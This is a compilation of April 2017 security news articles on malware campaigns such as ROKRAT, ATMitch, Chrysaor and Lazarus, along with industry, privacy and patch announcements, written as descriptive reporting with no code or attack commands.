New RAT Uses Popular Sites for Command and Control

4.4.2017 securityweek Virus
A newly discovered remote administration tool (RAT) uses popular legitimate websites for its command and control (C&C) communication and for the exfiltration of data, Talos researchers say.

Dubbed ROKRAT, the tool is distributed via email with a malicious Hangul Word Processor (HWP) document and targets victims in Korea, where the Office alternative is highly popular. Researchers found that one of the malicious spear phishing emails was sent from the email server of Yonsei, a private university in Seoul. To add legitimacy to the email, the attackers used the contact email of the Korea Global Forum as the sender’s address.

The malicious HWP document contained an embedded Encapsulated PostScript (EPS) object aimed at exploiting a well-known vulnerability (CVE-2013-0808) to download a binary masquerading as a .jpg file. When the file is decoded and executed, the ROKRAT malware is installed on the victim’s machine, Talos explains.

The RAT shows increased complexity by using legitimate websites such as Twitter, Yandex, and Mediafire as its C&C communication and exfiltration platforms. Not only are these websites difficult to block globally within organizations, but they also use HTTPS connectivity, which makes it difficult to identify specific patterns.

“One of the samples analyzed only uses Twitter to interact with the RAT, while the second one additionally uses the cloud platforms: Yandex and Mediafire. The Twitter tokens we were able to extract are the same in both variants. There is obvious ongoing effort to add features to this RAT to allow for more sophisticated levels of attacks,” Talos notes.

Upon analysis, the security researchers discovered that the RAT doesn’t work on Windows XP systems and also packs detection evasion capabilities, as it checks the compromised system for a series of tools used for malware analysis or within sandbox environments. Should such tools be discovered, the malware jumps to a fake function which generates dummy HTTP traffic.

For communication with the C&C platforms, the malware uses 12 hardcoded tokens (7 different Twitter API tokens, 4 Yandex tokens, and one Mediafire account). The malware checks the last message on the Twitter timeline to receive orders and can also tweet; and can download and execute files or upload stolen documents to disks in the Yandex cloud or Mediafire.

The malware also packs keylogging capabilities, and one of the samples was also observed taking screenshots of the infected systems, researchers say.

The actor behind this campaign is a motivated one, Talos notes. The RAT is innovative, using novel communication channels that are difficult to contain within organizations. Furthermore, the malware includes a series of exotic features, such as the ability to perform requests to legitimate websites (Amazon and Hulu) if executed in a sandbox.

“This investigation shows us once again that South Korean interests sophisticated threat actors. In this specific case, the actor compromised a legitimate email address of a big forum organized by a university in Seoul in order to forge the spear phishing email which increased the chance of success. And we know that it was a success, during the writing of the article we identified infected systems communicating with the command & control previously mentioned,” Talos concludes.


NoMoreRansom Expands with New Decryptors, Partners

4.4.2017 securityweek Virus
NoMoreRansom, a project launched in 2016 by Europol, the Dutch National Police, Kaspersky Lab and Intel Security (now once again McAfee) has published its latest progress report. NoMoreRansom collects the available ransomware decryption tools into a single portal that victims can use to recover encrypted files without having to pay the criminals.

Since the last Europol update in December 2016, the project's decryption library has been supplemented by the addition of 15 new decryption tools. The catalogue of project partners has expanded by 30 to 76 public and private members, including the law enforcement agencies of Australia, Belgium, Israel, South Korea, Russia and Ukraine; and Interpol. SentinelOne and Verizon Enterprise Solutions are among the new private members.

The full list of available decryption tools can be found here, while the project members can be found here.

According to Europol, 10,000 ransomware victims from all over the world have regained their files through NoMoreRansom since the last December update. Statistics show that most visitors to the platform come from Russia, the Netherlands, the United States, Italy and Germany.

One of the new decryptors, provided by Bitdefender, rescues files from the Bart family of ransomware. "The tool," says Bitdefender, "is a direct result of successful collaboration between Bitdefender, Europol and Romanian police, supporting the 'No More Ransom' initiative kick started by Europol's European Cybercrime Centre."

Unlike other ransomware families, Bart does not require an internet connection to encrypt the victim's files, although one is required to receive the decryption key from the attacker's C&C server. The malware doesn't function if the computer's language is detected as Russian, Belorussian, or Ukrainian -- "most probably," suggests Bitdefender, "because it was written by a Russian speaking hacker."

The developers of Bart are the same criminal gang as those behind the Dridex and Locky ransomware strains.

Losses to ransomware continue to increase, rising by 300% from 2015 to 2016 to an estimated total of $1 billion. Estimates for 2017 indicate that the threat is still growing.


Kantara Initiative Assists With EU Privacy and GDPR Issues

4.4.2017 securityweek Privacy
The US-based Kantara Initiative announced today that it has joined the European Trust Foundation to help its non-EU government and corporate members engage with Europe on pan-jurisdiction federated digital identity, trust and privacy initiatives.

The advent of the General Data Protection Regulation (GDPR) turns Kantara's development of good business practices into legal requirements for any enterprise that has a single customer within the European Union. The new alliance will make it easier for US business to engage with the European Commission over such issues.

There are still fundamental misconceptions in the common understanding of the GDPR: firstly, that it only involves European companies; and secondly, that it solely concerns the protection of personal data from being hacked. Neither are true. Any company anywhere in the world that trades with Europe is affected; and data protection now involves far more than the protection of data. GDPR shifts emphasis from company security to involved customer protection: secure customer relations are now a focus.

The issue is demonstrated by GDPR's 'consent' requirements. For a business to process personal data, it must now obtain consent, defined in article 4(11) as "any freely given, specific, informed and unambiguous indication of the data subject's wishes by which he or she by statement or by a clear affirmative action, signifies agreement to the processing of personal data relating to him or her."

The detail, requiring explicit informed consent (tick boxes and obscure T&Cs are no longer sufficient) will require changes to business practices. But consent can also be withdrawn -- and that will require changes to business processes. Commercial enterprises will need to manage consent as effectively as they manage identity; and indeed, the two become woven together.

This is where Kantara comes in. Its Consent Receipt Specification is a record of consent provided to an individual at the time the consent is given. The purpose is effectively to verify a consent contract, but it also provides a mechanism for the withdrawal of that consent. Coupled with a second evolving Kantara specification, User Managed Access (UMA) -- which enables the user to control how his or her data is shared -- these new initiatives could help provide a solution to the GDPR consent requirements.

Kantara's new relationship with the European Trust Foundation, which has a history of working closely with the European Commission, will help US consent mechanisms be accepted as adequate for the GDPR. But it is not just a one-way matter of compliance. It doesn't simply provide part of the legal basis for the transfer of personal data out of the EU; it is also part of the legal basis for making automated decisions relating to that personal information.

Consent receipts and user managed access are not simply a GDPR solution, they are good practices for the modern world. User trust in vendors' use of PII is low. If that can be improved so that secure customer relations can replace old-style hidden and obfuscated personal data collection, then new avenues for business will emerge.

In Kantara's own words, "When individuals are forced to sign organization-centric privacy policies/ terms of use, then this places limitations on the information that will be shared. If such constraints were removed, and capabilities built on the side of the individual, then new, rich information will flow -- including actual demand data (as opposed to derived/ predicted demand)."

But whatever solutions to GDPR requirements are chosen by US (or any non-EU) business, they will need to be accepted as adequate by the European Union -- and this is the aim of the new relationship between Kantara and the European Trust Foundation. "The European Trust Foundation aims to provide a valuable service to Kantara members located outside of Europe by helping to streamline the engagement process with the EU," said Colin Wallis, executive director, Kantara Initiative. "The foundation and organizations like Kantara act as a 'staging area' to help expedite the process of gathering information and presenting a common voice for non-EU countries to approach and engage with the EU on GDPR."


Google Announces New Accounts Sign-in Rules

4.4.2017 securityweek Safety
Google on Monday announced the rollout of a new Accounts sign-in page and of a series of updates to the policies that 3rd-party Single Sign-On (SSO) providers should comply with.

Starting on April 5, 2017, users will benefit from an updated experience when securely signing into their accounts, courtesy of a new Google Accounts login page. The new design, Google says, is meant to make the browser login experience consistent across computers, phones and tablets.

This change, Google also announced, is expected to impact organizations that use third-party applications within their networks, as well as those using a third-party SSO provider. “We recommend contacting your developer(s) or SSO provider to see if any updates are necessary,” Google says.

In a separate announcement, the Internet giant revealed that the changes affect Google and 3rd-party applications on iOS, mobile browsers on iOS and Android, and web browsers (Chrome, Firefox and other modern browsers).

Starting April 5, users of 3rd-party SSO providers will be better informed on the account they’re authenticating as well as the permissions they’re granting to applications. Android applications using the standard authentication libraries are already prompting users to select appropriate account information, meaning that these changes won’t impact them as well, the company reveals.

“It’s important that your users are presented with account information and credential consent, and apps should make this process easy and clear. One new change that you may now see is that only non-standard permission requests will be presented in the secondary consent screen in your application,” Google explains.

At the moment, app permissions requested by an application are displayed together, but users should have greater visibility into permissions being requested beyond the standard “email address” and “profile” consent, Google says. If additional permissions are requested by the app, a secondary consent screen is displayed.

Users will also have greater visibility into the 3rd-party application’s name and will also be able to click-through to get the developer’s contact information. Thus, application developers should use public-facing email addresses so that users could easily contact them for support or assistance.

“If your application may also be used by G Suite customers that employ a 3rd-party Single Sign-On (SSO) service, we recommend that you utilize the hd and/or login_hint parameters, if applicable. Even with the changes to the 3rd-party SSO auth flow, these parameters will be respected if provided. You can review the OpenID Connect page in the documentation for more information,” Google also notes.

G Suite users may notice redirection when signing into 3rd-party SSO providers as well. When no accounts are signed in, the user will be prompted to confirm the account after signing in to the 3rd-party SSO provider, which is meant to ensure that they’re signed in with the correct G Suite account. Users automatically opt into “email address” and “profile” consent, but will be redirected back to the application once they consent to any additional non-standard permissions that may be requested.

If the user is already signed in to one or more accounts matching the hd hint, the Account Chooser will display all the accounts and the user will have to select the appropriate G Suite account. Next, the user will be redirected to the 3rd-party SSO provider, then back to the application.


Turla Linked to One of the Earliest Cyberespionage Operations

4.4.2017 securityweek Virus
Researchers at Kaspersky Lab and King’s College London have identified a link between the Russian-speaking threat actor Turla and Moonlight Maze, one of the earliest known state-sponsored cyberespionage operations carried out in the ‘90s.

In around 1996, a threat group believed to be located in Russia had started spying on organizations in the United States, including the Pentagon, the Department of Energy and NASA. The actor had stolen vast amounts of sensitive information from universities, military and research organizations. The activities of the group, dubbed Moonlight Maze, were first made public in 1999 and detailed last year at Kaspersky’s SAS conference by Thomas Rid of King's College London.

Experts have dug further into Moonlight Maze’s activities and at this year’s SAS conference they presented evidence linking the threat actor to Turla. If Turla does in fact turn out to be an evolution of Moonlight Maze, that would make it one of the earliest and longest cyber espionage operations, along with the NSA’s Equation Group, which is also believed to have been active since the mid ‘90s.

Turla is also known as Waterbug, KRYPTON and Venomous Bear, and some of its primary tools are tracked as Turla (Snake and Uroburos) and Epic Turla (Wipbot and Tavdig). The threat actor has been linked to the Agent.BTZ malware, which indicates that Turla may have been active since as early as 2006.

Kaspersky and King’s College London researchers found precious information after learning of David Hedges, a now-retired administrator who got to watch Moonlight Maze in action when one of his servers was compromised by the threat group back in 1998. Hedges had allowed the attackers to use his server in order to help the Metropolitan Police in London and the FBI track the team’s activities.

Hedges still had the old server, which recorded data between 1998 and 1999, allowing the researchers to analyze the tools used at the time by Moonlight Maze.

The analysis showed that the attackers compiled most of their tools on UNIX operating systems such as Solaris and IRIX. One of the third-party tools they used was LOKI2, an open-source backdoor released in 1996.

LOKI2 has provided a link to Penquin Turla, a Linux backdoor identified by Kaspersky Lab in 2014. Penquin Turla’s code was compiled for Linux kernel versions released in 1999, and the malware was based on LOKI2, which had been designed for covert data exfiltration.

Researchers believe the Penquin Turla codebase was primarily developed between 1999 and 2004, but the malware was also spotted in the 2011 attack on Swiss defense firm RUAG, and a new sample was uploaded to the VirusTotal service in March 2017. The experts’ theory is that the hackers dusted off the old code and reused it in attacks aimed at highly secure entities whose defenses may have been more difficult to breach using the group’s typical Windows toolset.

While the use of LOKI2 source code and other similarities do provide a link between Turla and Moonlight Maze, more evidence is needed before researchers can say with certainty that the former is an evolution of the latter.

Further evidence may be found in data collected from a campaign dubbed Storm Cloud. The Wall Street Journal reported in 2001 that this operation had also involved LOKI2, but researchers currently have little information on Storm Cloud.


Kaspersky Links Global Cyber Attacks to North Korea

4.4.2017 securityweek BigBrothers
ST. MAARTEN – SECURITY ANALYST SUMMIT – Just days after reports surfaced that U.S. prosecutors were preparing to point fingers at the North Korean government for directing the $81 million cyber heist from Bangladesh's account at the New York Federal Reserve Bank in 2016, Kaspersky Lab unveiled new details on the hacking group believed to be conducting the attack and several others.

Considered to be one of the largest and most successful cyber heists ever, Kaspersky said there is a “high chance” that the attacks were conducted by Lazarus, a North Korea-linked hacking group responsible for a series of regular and destructive attacks, including the devastating attack against Sony Pictures in late 2014.

On Monday at Kaspersky Lab’s Security Analyst Summit in St. Maarten, the Moscow-based security firm shared its findings on the malicious tools the group uses and how it operates.

The company also said that it managed to disrupt other potential Lazarus operations attempting to steal funds from unnamed banks in Southeast Asia and Europe.

While Kaspersky’s team believes Lazarus to be large group focused on infiltration and espionage operations, the company said a “substantially smaller” unit within the group responsible for financial profit exists, which they have dubbed Bluenoroff.

In February, researchers discovered an attack aimed at banks in Poland that were linked back to Lazarus. As part of the operation, the attackers hijacked the website of the Polish Financial Supervision Authority (knf.gov.pl) so malware would be served to its visitors.

“The watering hole attack on Polish banks was very well covered by media, however not everyone knows that it was one of many,” Kaspersky explained. “Lazarus managed to inject malicious code in many other locations. We believe they started this watering hole campaign at the end of 2016 after their other operation was interrupted in South East Asia. Lazarus/Bluenoroff regrouped and rushed into new countries, selecting mostly poorer and less developed locations, hitting smaller banks because they are, apparently, easy prey.”

Since December 2015, Kaspersky Lab was able to detect malware samples relating to Lazarus group activity that appeared in financial institutions, casinos, software developers for investment companies and crypto-currency businesses in Korea, Bangladesh, India, Vietnam, Indonesia, Costa Rica, Malaysia, Poland, Iraq, Ethiopia, Kenya, Nigeria, Uruguay, Gabon, Thailand and several other countries.

Recent forensic analysis conducted by a Kaspersky Lab partner of a C2 server in Europe used by the Lazarus/Bluenoroff group also provided some interesting North Korea-related discoveries.

“Based on the forensic analysis report, the attacker connected to the server via Terminal Services and manually installed an Apache Tomcat server using a local browser, configured it with Java Server Pages and uploaded the JSP script for C2,” Kaspersky Lab's Global Research & Analysis Team explained in a blog post. “Once the server was ready, the attacker started testing it. First with a browser, then by running test instances of their backdoor. The operator used multiple IPs: from France to Korea, connecting via proxies and VPN servers. However, one short connection was made from a very unusual IP range, which originates in North Korea.”

North Korea Cyber Attack Attribution

Other firms, including BAE Systems and Symantec, previously had linked the Bangladesh theft to a series of cyber-attacks on the U.S. financial system and the hacking of Sony Pictures.

Still an Active Threat

Kaspersky’s team believes that Lazarus will remain one of the biggest threats to banking, finance and other firms for the next few years.

“We’re sure they’ll come back soon. In all, attacks like the ones conducted by Lazarus group show that a minor misconfiguration may result in a major security breach, which can potentially cost a targeted business hundreds of millions of dollars in loss,” said Vitaly Kamluk, head of the Global Research and Analysis Team APAC at Kaspersky Lab. “We hope that chief executives from banks, casinos and investment companies around the world will become wary of the name Lazarus.”

North Korea Cyber Attack Attribution

While Kaspersky Lab did not officially accuse North Korea as being behind the attacks, the firm did display a strong case against the Hermit State. "This is the first time we have seen a direct link between Bluenoroff and North Korea," the company said. "Their activity spans from backdoors to watering hole attacks, and attacks on SWIFT servers in banks of South East Asia and Bangladesh Central Bank. Now, is it North Korea behind all the Bluenoroff attacks after all? As researchers, we prefer to provide facts rather than speculations. Still, seeing IP in the C2 log, does make North Korea a key part of the Lazarus Bluenoroff equation."

In a presentation at the Security Analyst Summit, Kamluk said that, while unlikely, another group could have invested a huge amount of money to frame North Korea. He also speculated that a third force could be involved to help North Korea from the outside.

Kaspersky has published a detailed report (PDF), which includes infiltration methods, their relation to attacks on SWIFT software, and insights on attribution. The report also includes Indicators of Compromise (IOC) and other data to help defenders detect possible Lazarus-related activity in their networks. They also produced a short video summarizing the activity of the group.

 


Hackers stole $800,000 from ATMs using Fileless Malware
4.4.2017 thehackernews Virus
Hackers targeted at least 8 ATMs in Russia and stole $800,000 in a single night, but the method used by the intruders remained a complete mystery with CCTV footage just showing a lone culprit walking up to the ATM and collecting cash without even touching the machine.
Even the affected banks could not find any trace of malware on its ATMs or backend network or any sign of an intrusion. The only clue the unnamed bank's specialists found from the ATM's hard drive was — two files containing malware logs.
The log files included the two process strings containing the phrases: "Take the Money Bitch!" and "Dispense Success."
This small clue was enough for the researchers from the Russian security firm Kaspersky, who have been investigating the ATM heists, to find malware samples related to the ATM attack.
In February, Kaspersky Labs reported that attackers managed to hit over 140 enterprises, including banks, telecoms, and government organizations, in the US, Europe and elsewhere with the 'Fileless malware,' but provided few details about the attacks.
According to the researchers, the attacks against banks were carried out using a Fileless malware that resides solely in the memory (RAM) of the infected ATMs, rather than on the hard drive.
Now during the Kaspersky Security Analyst Summit in St. Maarten on Monday, security researchers Sergey Golovanov and Igor Soumenkov delved into the ATM hacks that targeted two Russian banks, describing how the attackers used the fileless malware to gain a strong foothold into bank's systems and cash out, ThreatPost reports.
Mysterious ATM Hack Uncovered by Researchers
kaspersky-fileless-malware
Dubbed ATMitch, the malware — previously spotted in the wild in Kazakhstan and Russia — is remotely installed and executed on ATMs via its remote administration module, which gives hackers the ability to form an SSH tunnel, deploy the malware, and then sending the command to the ATM to dispense cash.
Since Fileless malware uses the existing legitimate tools on a machine so that no malware gets installed on the system, the ATM treats the malicious code as legitimate software, allowing remote operators to send the command at the time when their associates are present on the infected ATM to pick up the money.
This ATM theft takes just a few seconds to be completed without the operator physically going near the machine. Once the ATM has been emptied, the operator 'signs off,' leaving a very little trace, if any, of the malware.
However, this remote attack is possible only if an attacker tunnels in through the bank's back-end network, a process which required far more sophisticated network intrusion skills.
A Very Precise Form of Physical Penetration
Since opening the ATM's panel directly could also trigger an alarm, attackers switched to a very precise form of physical penetration: Drilling a golf-ball sized hole in ATM's front panel to gain direct access to the cash dispenser panel using a serial distributed control (SDC RS485 standard) wire.
This method was revealed when Golovanov and Soumenkov were able to reverse engineer the ATM attack after police arrested a man dressed as a construction worker while he was drilling into an ATM to inject malicious commands in the middle of the day to trigger the machine’s cash dispenser.
The suspect was arrested with a laptop, cables, and a small box. Although the researchers did not name the affected ATM manufacturer or the banks, they warn that ATM burglars have already used the ATM drill attack across Russia and Europe.
In fact, this technique also affects ATMs around the world, leaving them vulnerable to having their cash drawn out in a matter of minutes.
Currently, the group or country behind these ATM hacks is unknown, but coding present in the attack contains references to the Russian language, and the tactics, techniques, and procedures bear a resemblance to those used by bank-robbing gangs Carbanak and GCMAN.
Fileless malware attacks are becoming more frequent. Just last month, researchers found a new fileless malware, dubbed DNSMessenger, that uses DNS queries to conduct malicious PowerShell commands on compromised computers, making the malware difficult to detect.


Google just discovered a dangerous Android Spyware that went undetected for 3 Years
4.4.2017 thehackernews Android
An Android version of one of the most sophisticated mobile spyware has been discovered that remained undetected for at least three years due to its smart self-destruction capabilities.
Dubbed Chrysaor, the Android spyware has been used in targeted attacks against activists and journalists mostly in Israel, but also in Georgia, Turkey, Mexico, the UAE and other countries.
Chrysaor espionage malware, uncovered by researchers at Lookout and Google, is believed to be created by the same Israeli surveillance firm NSO Group Technologies, who was behind the Pegasus iOS spyware initially detected in targeted attacks against human rights activists in the United Arab Emirates last year.
NSO Group Technologies is believed to produce the most advanced mobile spyware on the planet and sold them to governments, law enforcement agencies worldwide, as well as dictatorial regimes.

The newly discovered Chrysaor spyware has been found installed on fewer than three-dozen Android devices, although researchers believe that there were more victims before its detection, who most likely have either formatted or upgraded their phones.
"Although the applications were never available in Google Play, we immediately identified the scope of the problem by using Verify Apps," Google said in its own blog post published Monday.
"We've contacted the potentially affected users, disabled the applications on affected devices, and implemented changes in Verify Apps to protect all users."

Just like Pegasus for iOS, the newly discovered Chrysaor for Android also offers a wide array of spying functions, including:
Exfiltrating data from popular apps including Gmail, WhatsApp, Skype, Facebook, Twitter, Viber, and Kakao.
Controlling device remotely from SMS-based commands.
Recording Live audio and video.
Keylogging and Screenshot capture.
Disabling of system updates to prevent vulnerability patching.
Spying on contacts, text messages, emails and browser history.
Self-destruct to evade detection
"If it feels like it's going to be found, it removes itself," said Lookout Security researcher Michael Flossman. "That's why it took so long to find these samples."
Researchers believe that Chrysaor APK has also been distributed via SMS-based phishing messages, just like Pegasus infection on iOS devices.
While Pegasus leveraged three then-zero day vulnerabilities in Apple's iOS operating system to jailbreak the targeted iOS devices, Chrysaor uses a well-known Android-rooting exploit called Framaroot to root the device and gain full control over the operating system.
Since Chrysaor dates back to 2014, there are possibilities that NSO group might have discovered zero-day vulnerabilities in Android and deployed them on the latest version of Chrysaor for Android, Lookout warned.
Lookout has also provided full, technical details on Chrysaor in its report [PDF] titled "Pegasus for Android: Technical Analysis and Findings of Chrysaor." So, you can head on to the link for a more detailed explanation on the malware.
How to Protect your Android device from Hackers? Google recommends users to install apps only from reputable sources, protect your device with pin or password lock, enable ‘verify apps’ feature from settings, and obviously, keep your device always up-to-date with the latest security patches.


Malware Allows Remote Administration of ATMs

4.4.2017 securityweek Virus
A recently discovered piece of malware allows attackers to remotely control compromised ATMs (automated teller machines), Kaspersky Lab reveals.

The threat was discovered after a Russian bank was hit by a targeted attack where cybercriminals gained control of ATMs and uploaded malware to them. Although the actors did remove the malware after the heist, which left researchers without an executable to analyze, the malware’s logs and some file names were restored after the attack, which Kaspersky researchers were able to analyze.

The files were recovered by the bank’s forensic team, which provided the security researchers with two text files (located at C:\Windows\Temp\kl.txt and C:\logfile.txt), and the names of two deleted executables (C:\ATM\!A.EXE and C:\ATM\IJ.EXE). However, the contents of the exe files couldn’t be retrieved, Kaspersky notes.

Based on the information retrieved from the log files, the researchers created a YARA rule to find a sample, and eventually found one, in the form of “tv.dll”. This in turn led to the discovery of ATMitch, a piece of malware that essentially provides attackers with the ability to remotely administrate ATMs.

The malware is installed and executed via Remote Desktop Connection (RDP) access to the ATM from within the bank. Once on the infected machine, the threat looks for the “command.txt” file located in the same directory as the malware itself, as this file includes a list of one character commands: ‘O’ – Open dispenser; ‘D’ – Dispense; ‘I’ – Init XFS; ‘U’ – Unlock XFS; ‘S’ – Setup; ‘E’ – Exit; ‘G’ – Get Dispenser id; ‘L’ – Set Dispenser id; and ‘C’ – Cancel.

After that, the malware writes the results of the command to the log file and removes “command.txt” from the ATM’s hard drive. ATMitch, which apparently doesn’t try to conceal within the system, uses the standard XFS library to control the ATM, meaning that it can be used on all ATMs that support the XFS library.

The !A.exe and IJ.exe executables, which might be the installer and uninstaller of the malware, couldn’t be retrieved. “tv.dll”, the researchers say, contained one Russian-language resource.

This attack, Kaspersky notes, was connected to a fileless attack detailed in February 2017, which targeted numerous organizations worldwide. The attack, Morphisec revealed last month, was tied to an attack framework used in a series of other incidents detailed by Cisco and FireEye as well.


Apple Updates iOS to Patch Wi-Fi Vulnerability

4.4.2017 securityweek iOS
Apple has released an emergency security update for its iOS operating system to address a serious vulnerability affecting the Wi-Fi component.

According to the tech giant, the flaw is a stack-based buffer overflow that allows an attacker who is within range to execute arbitrary code on the Wi-Fi chip.

The security hole, tracked as CVE-2017-6975, has been addressed with the release of iOS 10.3.1 through improved input validation, Apple said. The update is available for iPhone 5 and later, iPod touch 6th generation and later, and iPad 4th generation and later.

9to5 Mac reported that while iOS 10.3 dropped support for 32-bit devices, the latest update reintroduces support for these systems.

The vulnerability was identified and reported by Gal Beniamini of Google Project Zero, which typically discloses the details of flaws found by its researchers after 90 days.

In a security advisory submitted to the Full Disclosure mailing list, Apple advised users to install the update immediately if possible, and pointed out that the update is only available through iTunes and the Software Update utility on the iOS device; the update will not show up on the Apple Downloads website or in the computer's Software Update application.

iOS 10.3.1 was released just one week after Apple announced the general availability of iOS 10.3, which brings many new features and patches for nearly 90 vulnerabilities. Roughly 30 of these security holes were reported to Apple by Google Project Zero researchers.


It's Official: McAfee Breaks Away from Intel With New Logo

4.4.2017 securityweek IT
McAfee Spins Out from Intel as a New Independent Company With Refreshed Logo

McAfee, one of the best known and persistent brands in cybersecurity, has re-emerged from Intel as an independent company. It was acquired by Intel for $7.68 billion in 2010. In 2014, Intel announced the McAfee brand would be phased out and replaced by Intel Security, although retaining the red shield logo. In September 2016, Christopher Young, SVP and GM of the Intel Security Group, announced that McAfee would again be an independent company -- 49% owned by Intel and 51% owned by TPG. This transaction values the company at $4.2 billion.

The spin out is now complete, and McAfee is again an independent company. In this incarnation, the name is retained, but the original red shield logo is replaced by a stylized red shield and includes the epithet 'Together is power.' Chris Young is the CEO.

New McAfee LogoThe McAfee brand has proved remarkably resilient over the years. It was one of the earliest security brands, and has survived the disdain of its original developer, the somewhat maverick John McAfee. But it has greater challenges ahead. To really succeed, Chris Young will need to transform an image associated with early, signature-based, legacy anti-virus into something more contemporary.

New McAfee Logo

The original anti-virus companies -- almost all now more than just AV -- were caught napping by the second-generation AV companies, who marketed themselves as machine-learning (ML) endpoint protection firms. The general perception is that machine-learning and artificial intelligence is the way forward, evidenced by another legacy firm, Sophos, buying ML firm Invincea. Young will need to transform public perception of an old brand into something more dynamic and forward thinking.

McAfee's plan is to achieve this by evolution rather than revolution. There are no major new security initiatives announced today, although a raft of new products were announced at the end of 2016. "We will continue to be very focused on our customers. The strategy outlined at our annual security conference, FOCUS 16, will be the same. We are focused on end-to-end solutions and pivoting to the cloud," says the company.

McAfee's vision is to accelerate its existing strategy to drive cybersecurity towards true automation, not just for itself but across the whole industry. Its belief is that it can better focus on this strategy as an independent company.

"Security is the fastest-growing, but also the most fragmented and least profitable of all parts of IT," corporate VP of global products at Intel Security, Brian Dye, told SecurityWeek. "That tells us we're doing something fundamentally wrong." He believes that automation is the solution to weak security, fragmentation, and profitability. "We want to drive a level of automation across the industry and bring that level of automation into our own portfolio -- being standalone lets us focus on that mission wholeheartedly."

He describes McAfee's path as an evolution from integration, "which is what we've done historically with ePolicy Orchestrator's single management pane of glass for the SOC;" to automation, "which is what we are doing with the Data Exchange Layer (DXL);" and ultimately on towards full orchestration, "which will bring together and automate more and more complex and sophisticated workflows."

Key to this evolution is the big data threat intelligence derived from the telemetry of millions of customers on endpoints and corporate servers across the globe driving automation, through machine learning and artificial intelligence, across the DXL fabric. The aim is to move towards full closed loop zero human touch automation wherever possible; and improved human/machine teaming elsewhere.

DXL allows the sharing of actionable threat intelligence not just across the McAfee portfolio, but also between the products of partners in the McAfee Security Innovation Alliance. Dye believes that increasing and improving machine learning will allow full automation across the whole SOC; and that DXL will provide the backbone of that automation.

But he sees this as not merely a vision but a necessity for the future. "The only way we will be able to adapt to the changes that are happening, from the cloud to edge computing and the IoT, is if we automate the security tasks across the industry," he told SecurityWeek. "We have to do that to free up the people and bandwidth to allow the implementation of these changes and new technologies. When new technologies arrive, you simply plug them into the DXL fabric. Change becomes an accelerator not an inhibitor; and it is our belief is that this is required for industry to be successful."

Through DXL and threat intelligence, he said, "we can drive the rebirth of one of cybersecurity's best known brands."


Honeywell SMX Protects Industrial Sites From USB Threats

4.4.2017 securityweek Cyber
Honeywell SMX

Honeywell announced on Tuesday the launch of a new product designed to protect industrial facilities from USB-borne threats by providing a simple way for organizations to track the removable media devices connected to their systems.

The new product, Secure Media Exchange (SMX), has two main components: an intelligence gateway and a piece of software installed on endpoints.

When a contractor wants to use a USB drive in a protected organization, they need to check the device at the intelligence gateway, a touchscreen system that can reside at the physical front desk or another location where it can be easily accessed by visitors.

Before entering the facility, users are prompted to complete a check-in procedure by connecting their USB drive to the gateway. The files stored on the drive are verified by Honeywell’s Advanced Threat Intelligence Exchange (ATIX) cloud service, which relies on both signatures and behavior analysis (i.e. running suspicious files in a special ICS sandbox) to identify known and zero-day threats.

According to Honeywell, the check-in process typically takes as long as a regular malware scan, depending on the size of the drive and the number of files. The ATIX service checks for known good and known bad files to expedite the process, and the scan can also be sped up by quarantining all files except for the ones that need to be used.

Once the process has been completed, the user can take the USB device and attach it to any endpoint within the organization. Devices that have not been checked by the gateway (e.g. a contractor wants to connect their smartphone for charging) will be blocked from using the endpoint's USB port.

The SMX client software running on endpoints will ensure that access to the files on a device is restricted if the check-in process has not been completed or if signs of tampering are detected.

In order to prevent malware from entering an organization, suspicious files are quarantined inside a password-protected archive file. Administrators can also block specific file types from getting into the facility.

When a contractor leaves the site, they will need to complete a check-out process at the SMX gateway. Failure to complete the process can result in the inability to access the files on the removable media device from a different computer. However, Honeywell says there are mechanisms in place to allow users to conduct the check-out process at a later time (e.g. a contractor could forget to complete the process when leaving an offshore platform via helicopter).

In addition to giving the user access to his/her files, the check-out process is designed to scan the device once again for malware in an effort to identify any threats that may already be inside the plant.

There have been several high-profile incidents where USB drives had been used to plant malware on an industrial network, including the notorious Stuxnet attacks and a 2013 incident that affected two US power plants.

Malware delivered via removable media is considered one of the biggest threats to industrial environments, but this type of storage is often required to perform updates. The risk is not easy to address, especially since, according to Honeywell, on average, an organization has seven different brands of control systems that require USB updates, and the number of daily contractors on site ranges between 25 and 150.


IAAF Says Russia-Linked Hackers Accessed Medical Records

4.4.2017 securityweek Hacking

The International Association of Athletics Federations (IAAF) revealed on Monday that athletes' medical records were accessed in an attack the organization believes was carried out by the Russia-linked cyber espionage group known as Fancy Bear.

Fancy Bear is also known as APT28, Pawn Storm, Strontium, Sofacy, Sednit and Tsar Team. The group is said to be responsible for many high-profile attacks, including the recent U.S. election hacks.

The IAAF, which is based in Monaco, said it learned of the breach after it hired incident response firm Context Information Security in January to conduct a technical investigation. Investigators found signs of unauthorized remote access on February 21, when they discovered metadata on athletes' Therapeutic Use Exemption (TUE) applications stored in a newly created file.

The breach impacts athletes who have applied for TUEs since 2012. Affected individuals have been contacted by the IAAF.

It's unclear if the attackers managed to exfiltrate the information they collected, but IAAF believes this provides a strong indication of what the attackers were after. The IAAF is confident the threat actor no longer has access to its networks following clean-up efforts assisted by Context, the UK National Cyber Security Centre (NCSC), and the Agence Monégasque de Sécurité Numérique (Monaco AMSN).

This is not the first time Fancy Bear has been accused of targeting an athletic organization. Last year, the World Anti-Doping Agency (WADA) said the hackers had stolen sensitive athlete data, including medical test results and TUEs.

Researchers linked the attack on WADA to the Fancy Bear cyberspies, but a group calling itself “Fancy Bears,” claiming to be affiliated with the Anonymous hacktivist movement, also took responsibility for the breach and leaked some of the stolen files.

In the WADA attack, hackers gained unauthorized access to the Anti-Doping Administration and Management System (ADAMS) after using a fake website to phish credentials. In the case of IAAF, there is no information on how the attackers may have gained access to the organization’s systems.


Joining the dots between the ancient Moonlight Maze espionage campaigns and the Turla APT
4.4.2017 securityaffairs Virus

Experts at Kaspersky presented the findings of its research that definitively connect the Moonlight Maze cyber espionage campaigns to the Turla APT group.
One year ago, the researcher Thomas Rid at the Security Analyst Summit disclosed the alleged links between the Moonlight Maze cyber espionage operation of mid 1990s and the Turla APT.

Today at the annual Kaspersky Lab conference, Rid, along security experts Costin Raiu and Juan Andres Guerrero-Saade presented the findings of its research that definitively connect the Moonlight Maze cyber espionage campaigns to the Russian APT group.


Moonlight Maze is the code name assigned to one of the first detected cyber espionage campaigns that targeted a number of critical U.S. government agencies, including the Pentagon, NASA and the Department of Energy.

Threat actors behind the Moonlight Maze were focused on UNIX systems such as Sun Solaris, while the Turla APT is more specialized in attacks on Windows systems.

